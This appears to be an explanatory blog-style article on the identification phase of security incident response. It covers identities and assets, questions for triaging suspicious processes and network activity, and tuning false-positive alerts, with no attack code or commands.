The process of detecting security incidents is an essential part of incident response. It can be difficult to determine whether an activity is malicious or simply suspicious in nature. During the preparation phase, it is important to scrutinize alerts from properly configured and tested log sources to distinguish pertinent alerts that signify potential security breaches. To determine the extent of the incident, it is necessary to examine identity information and resources involved. Analyzing these factors can help to ascertain whether an incident is occurring and determine the appropriate response and escalation. The main objective of the identification phase is to detect potential security incidents as soon as possible, enabling mitigation of damage and safeguarding crucial systems and data.
What is an identity and assets
In the sphere of incident response, the term “identity” pertains to any object that has the privilege to access resources. This encompasses not only human user accounts but also service accounts and computers, all of which possess attributes and authorization to diverse assets. The management of identity represents an essential aspect of cybersecurity, and the documentation of these transactions is vital for identifying potential security incidents.
When we allude to identities and assets, we are mainly referring to user accounts (human and non-human) and workstations, servers, and other equipment, respectively. The identification of the identity and assets embroiled in an incident can aid in the determination of the extent and gravity of the incident, and analyzing the recorded transactions can offer valuable insight into what transpired.
By focusing closely on identity information and asset access, organizations can enhance their incident response capabilities and curtail the impact of security incidents. Remember, the aim of incident response is not merely to respond to and recover from incidents but also to prevent them from occurring in the first place. A comprehensive and properly executed identity and access management plan is vital to achieving this objective.
Incident Identification Phase
The key to identifying security incidents is being able to determine whether an alert is real or a false positive. This requires asking questions such as:
- Is a malicious actor detected on the network, or is it a legitimate IT support process?
- Is it a password spray or just a user with poor password skills?
- Is the activity on one machine or multiple machines?
When examining an alert, it is essential to look at the process name, parent process, and any children. Additionally, reviewing all processes running on the machine can provide a clearer picture. Consider these questions when analyzing the process:
- Does it look like a normal process?
- Is it a common process on the network?
- Does it spawn children or normally spawn from the parent like that?
- Review the execution command line path, as the “living off the land” technique can be used to hide malicious activity.
Check the user accounts associated with the system to determine whether the activity is a false positive caused by IT support processes. If an IT support account is logged in, it is likely that tools and software were installed that would trigger security alarms. Confirm the activity with the IT support person to verify the false positive.
Review the network activity of the device if IT involvement is ruled out. Consider these questions:
- What other IP addresses is it communicating with?
- On what ports is it communicating?
- Is it communicating to any URLs?
- Can you resolve any of the IP addresses?
- Are they external and do they show up as malicious or have low reputation scores?
Malware often needs to write to disk, so look for odd files in the downloads folder or temporary files. Anything mounting as a drive is also suspicious. Research the filename on Google to find more information on known threats or to identify the hash using Virus Total searches. If no information is found, it is likely malicious.
Understand the alert’s purpose and its relationship to incident response. Review the alert’s description and event data to determine whether it is a false positive. If you believe the activity is malicious, look for it elsewhere on the network during the containment and eradication phases to remove it fully.
Incident Identification Phase – False Positives
False positives in security alerts are a recurrent incident and demonstrate the efficacy of the alert. Nevertheless, dismissing them entirely could lead to a loss of valuable data. Rather, it is necessary to finely tune these false positives to minimize the noise and maximize the alert’s value. Typically, false positives can be remedied by making minor adjustments post initial fine-tuning. Only under extreme circumstances where the alert generates an overwhelming volume of noise that diminishes its overall value should one consider disabling it as a last resort. It is vital to acknowledge that this decision should be approached with caution and made only after careful deliberation.
Incident Identification Phase Complete
In conclusion, incident response is a critical process for organizations of all sizes to protect against cybersecurity threats and ensure business resilience. The identification phase, in particular, is crucial for detecting potential security incidents as soon as possible, enabling organizations to minimize damage and safeguard crucial systems and data.
By scrutinizing alerts generated by properly configured and tested log sources, analyzing identity information and asset access, and fine-tuning false positives, organizations can improve their incident response capabilities and prevent future incidents from occurring. Ultimately, a comprehensive and well-implemented incident response plan is essential for protecting against cybersecurity threats and ensuring the resilience of the organization. By investing in incident response, organizations can minimize the impact of security incidents, enhance their overall security posture, and better protect their critical assets and data.